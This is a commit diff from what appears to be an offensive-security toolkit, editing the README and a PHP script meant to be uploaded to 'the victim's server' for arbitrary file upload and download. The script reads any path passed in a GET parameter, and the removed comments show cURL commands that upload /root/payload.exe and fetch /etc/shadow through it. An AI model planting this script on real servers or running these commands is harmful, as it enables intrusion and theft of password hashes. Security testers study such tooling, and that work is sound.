File Upload Update

Author: ivan-sincek

Diff for: README.md

@@ -56,6 +56,8 @@ Check the [simple PHP file upload/download script](https://github.com/ivan-since
 
 When downloading a file, you should [URL encode](https://www.urlencoder.org) the file path, and specify name of the output file.
 
+Depending on the server configuration, downloading a file through HTTP GET parameter might not always work, so you will have to hardcore the file path in the script.
+
 ### Case 1: Upload the Script to the Victim’s Server
 
 Navigate to the script on the victim's server with your preferred web browser, or use cURL from you PC.

Diff for: src/web/files.php

@@ -17,8 +17,6 @@
         $output = "SUCCESS: File was uploaded to '{$output}'";
     }
     unset($_FILES[$parameter]);
-    // you can use cURL to upload local files
-    // curl -s -k -X 'POST' 'https://somedomain.com/files.php' -F 'file=@/root/payload.exe'
 }
 if (isset($_SERVER['REQUEST_METHOD']) && strtolower($_SERVER['REQUEST_METHOD']) === 'get' && isset($_GET[$parameter]) && ($_GET[$parameter] = trim($_GET[$parameter])) && strlen($_GET[$parameter]) > 0) {
     $output = @file_get_contents($_GET[$parameter]);
@@ -31,8 +29,6 @@
         $output = 'download';
     }
     unset($_GET[$parameter]);
-    // you can use cURL to download remote files
-    // curl -s -k -X 'GET' 'https://somedomain.com/files.php?file=/etc/shadow' -O ./
 }
 // if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
 // garbage collector requires PHP v5.3.0 or greater